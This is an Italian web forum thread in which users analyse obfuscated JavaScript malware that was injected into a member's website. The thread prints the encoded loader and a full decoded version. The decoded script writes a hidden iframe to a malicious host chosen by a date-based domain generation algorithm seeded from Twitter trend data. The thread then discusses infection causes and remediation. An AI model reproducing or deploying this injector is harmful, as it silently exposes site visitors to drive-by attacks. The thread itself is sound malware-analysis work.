Z2ftreZ6edZ73Z2fweZ65Z6bly.Z6aZ73Z6fn?Z63Z61Z6cZ6c Z62acZ6bZ3dcallbZ61cZ6b&Z65xZ63lZ75Z64eZ3dhasZ68ta Z67sZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);Z7delZ73eZ7b$aZ3dZ27Z27};funcZ74ionZ 20Z73c(cZ6emZ2cvZ2cedZ29Z7bvZ61r Z65xdZ3dZ6eZ65w DZ61tZ65()Z3bZ65Z78d.sZ65Z74Z44atZ65(exZ64.Z67etZ4 4aZ74Z65Z28)+eZ64);Z64ocuZ6dentZ2ecooZ6biZ65Z3dcnm + Z27Z3dZ27 +escZ61pZ65(Z76)+Z27;Z65xpiZ72Z65Z73Z3dZ27+eZ78dZ2 etoGZ4dTZ53tZ72iZ6eg()Z3b}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)== "Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}eval(z($a));

[SergiusXP]

ok non lo proviamo... Ma cosa fa? =) Scusate la mia ignoranza in materia di virus ù__ù di JS me ne intendo abbastanza da creare siti... Ma questo? O__O

[Habanero]

dopo aver risolto le 1000 scatole cinesi che codificano lo script si ottiene il seguente codice equivalente:

codice:

<script type="text/javascript">

$a="<div style=\"visibility:hidden\"><iframe src=\"http://fbcmfir.com/ld/prox/\" width=100 height=80></iframe></div>";

function sc(cnm,v,ed)
{
    var exd=new Date();
    exd.setDate(exd.getDate()+ed);
    document.cookie=cnm+ '=' +escape(v)+';expires='+exd.toGMTString();
};



if (document.cookie.indexOf('rf5f6ds')==-1)
{
    function callback(x)
    {
        window.tw = x;
        sc('rf5f6ds',2,7);
        var d='fbcmfir.com'; 
        var shiftIndex = 0;
        var months = new Array('uno', 'dve', 'thr', 'fir', 'vif', 'xes', 'ves', 'ght', 'eni', 'etn', 'lev', 'twe');
        var letters = new Array('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z');
        var numbers = new Array(1,2,3,4,5,6,7,8,9);
        var time = new Array();
        var date = new Date();
        date.setDate(date.getDate() - 3);
        time['year'] = date.getFullYear();
        time['month'] = date.getMonth()+1;
        time['day'] = date.getDate();
        
        if (date.getDay() == 1 || date.getDay() == 6 || date.getDay() == 4)
        {
            date.setDate(date.getDate() - 1);
            time['day'] = date.getDate();
            time['month'] = date.getMonth()+1;
            time['year'] = date.getFullYear(); 
        } 
        
        date.setDate(date.getDate() + 1); 
        
        if (date.getMonth()+1 < 10)
        {
            shiftIndex = time['year'] + '-0' + (date.getMonth()+1) ;
        }
        else
        {
            shiftIndex = time['year'] + '-' + (date.getMonth()+1);
        }
        if (date.getDate() +1 < 10)
        {
            shiftIndex =shiftIndex + '-0' + date.getDate();
        }
        else
        {
            shiftIndex = shiftIndex + '-' + date.getDate();
        }
        
        shiftIndex = window.tw.trends[shiftIndex][0].query.charCodeAt(1);
        
        function CalculateMagicNumber(day, month, year, index)
        {
            return (((year + (index * day)) + (month ^ day) * index) + day);
        }
        
        var yearCh1, yearCh2, monthCh, dayCh, magicNum;
        num = CalculateMagicNumber(time['day'], time['month'], time['year'], shiftIndex);
        yearCh1 = letters[(((time['year'] & 0xAA) + num) % 63) % 26] + letters[(((time['year'] & 0xAA) << 2) + num) % 25];
        yearCh2 = letters[((((time['year'] & 0x3311) >> 3) + num) % 10)] + letters[((((time['year'] & 0x3311) >> 4) + num) % 10)];
        monthCh = letters[((time['month'] + num) % 25)] + letters[((time['month'] * num) % 25)];
        dayCh = letters[((time['day'] * 6) % 27)];
        $a=$a.replace(d,yearCh2 + monthCh + yearCh1 + dayCh + months[time['month'] - 1] + '.com');

        document.write($a);
    }
    
    document.write(" <scr"+"ipt language=javascript"+" src='http://search.twitter.com/trends/weekly.json?callback=callback&exclude=hashtags'>" + "</scr" + "ipt>");
}
else
{
    $a=''
};


</script>

che in poche parole può essere spiegato nel seguente modo:

1) Il corpo principale viene chiamato solo se non è presente il cookie rf5f6ds
2) Se il cookie non è presente viene eseguito:
document.write(" <scr"+"ipt language=javascript"+" src='http://search.twitter.com/trends/weekly.json?callback=callback&exclude=hashtags'>" + "</scr" + "ipt>"); che oltre a stampare il logo del feed rss preso dal sito di twitter, richiama lo script http://search.twitter.com/trends/weekly.json?callback=callback&exclude=hashtags sempre prelevato dal sito di twitter. Tale script (legittimo) altro non è che contenuto json.
3) il contenuto del file json è eseguito come script: al suo interno è presente una chiamata ad una funzione di nome callback a cui viene passato un elenco corposo di dati.
4) la funzione callback viene però definita nel nostro script maligno!! si usa codice legittimo prelevato da un sito esterno per chiamare una funzione illegittima (serve presumibilmente per confondere le acque)
5) entrati nella funzione callback per prima cosa si assegna il corposo argomento passato dal file json ad una proprietà tw dell'oggetto window.
6) viene impostato un cookie di nome rf5f6ds in modo che il processo non possa ripetersi nel caso la pagina venga invocata più volte
7) tutto quello che segue è un algoritmo che, in base alla data attuale e al contenuto della corposa variabile passata alla funzione callback presente nel file sul sito di twitter, calcola un nome di dominio pseudo casuale ma riproducibile una volta note le variabili di codifica.
8) l'ultima operazione eseguita consiste nel prendere la variabile $a (contiene dati per stampare un div hidden contenente un iframe) e sosituire il contenuto standard dell'url caricato dall'iframe (vedi contenuto della variabile d [fbcmfir.com]) con quello calcolato dall'algoritmo precedente)
9) la variabile $a viene stampata per generare codice html
10) attualmente nel suo complesso l'effetto dello script genera il seguente codice:

codice:

<script language="javascript" src="http://search.twitter.com/trends/weekly.json?callback=callback&amp;exclude=hashtags"></script>
<div style="visibility: hidden;">
  <iframe src="http://cdopuxpetn.com/ld/prox/" width="100" height="80"></iframe>
</div>

L'effetto globale quindi è quello di richiamare in un iframe nascosto un url che cambi periodicamente, apparentemente in modo casuale, in realtà frutto di un algoritmo basato sulla data attuale e sul contenuto di file prelevati dal sito di twitter.

[blindy]

davvero complimenti! non so come darteli 1000 punti ma sono tuoi

Spieghi tutto in modo completo e approfondito bravo

Segnalo qui un sito molto utile http://wepawet.iseclab.org/index.php per questo genere di problemi.

Visto che ci siamo ti pongo un altra domanda:

è qualche giorno che qualcuno inietta questo codice sul mio sito, sembra mi abbia preso di mira, anche il cambio di password dell'FTP non ha risolto la cosa. Può essere che venga iniettato direttamente dal web ?
Purtroppo non ho i log dell'FTP e l'accesso diretto alla macchina dato che si tratta di un Hosting condiviso di aruba. Hai qualche info su come questo tipo di malware si possa iniettare anche pochi minuti dopo averlo rimosso manualmente da file js?

Grazie!
ciao

[Habanero]

carino il link che hai postato, mi avrebbe fatto risparmiare un po' di tempo... :-)
Peccato che in modo automatico arrivi a decodificare solo il primo livello... modificando il file dopo la prima decodifica però è possibile farlo praticamente alla fine.

Per quanto riguarda l'origine delle modifiche "pirata" alle tue pagine di solito le cause possono essere raggruppate nelle seguenti categorie.

1) furto di credenziali ftp dopo aver fatto l'upload dei file sul sito da un pc infetto.
Soluzione: ripulire i pc usati per l'upload e cambiare le credenziali

2) uso di script lato server vulnerabili. In questo caso il pirata potrebbe essere in grado di usare tali vulnerabilità per caricare codice sul server.
Soluzione: aggiornare gli script o correggere manualmente le falle.

3) server vulnerabile o scarsamente protetto. Questo aspetto è responsabilità dell'hoster. Costituisce sicuramente la casistica meno frequente ma non è da escludere ed è già successo. Può essere una vulnerabilità del server stesso o delle impostazioni che permettono, ad esempio, l'accesso cross-domain al filesystem negli hosting condivisi.

[blindy]

Putroppo ho trovato quel sito dopo che aver aperto il topic

Per quanto riguarda il "pirata" ho cambiato i permessi alle cartelle del server mettendole solo in lettura, ....... sembra quindi che ( per ora ) il codice nn venga più iniettato.

Quindi tendo a pensare che possa essere stato qualche script con qualche falla di sicurezza su cui bisognerà indagare...

Grazie dell'aiuto!

Ciao

[Habanero]

Se la restrizione dei diritti dà risultati positivi si può certamente escludere l'accesso via FTP. Probabile qualche iniezione via script vulnerabile.
In ogni caso tale misura, per quanto sia cosa buona, è una soluzione parziale. Il tuo obiettivo dovrebbe essere la chiusura della falla.
Se hai accesso agli access log del web server potresti provare a ricercare attività strane nel periodo in cui è comparso il problema.

[SergiusXP]

adesso che siamo in argomento.. Come si fa a codificare (o decodificare) come in questo caso uno script?

Grazie!

-Sergio

[Habanero]

Originariamente inviato da SergiusXP
adesso che siamo in argomento.. Come si fa a codificare (o decodificare) come in questo caso uno script?

Grazie!

-Sergio

il principio base è quello di sostituire gli eval o i document.write di variabili, con degli alert. In questo modo si visualizza il codice decodificato (perchè il javascript stesso deve autodecodificarsi) senza eseguirlo.

Nel caso in oggetto la cosa è relativamente complessa in quando la decodifica avviene in un certo numero di passaggi.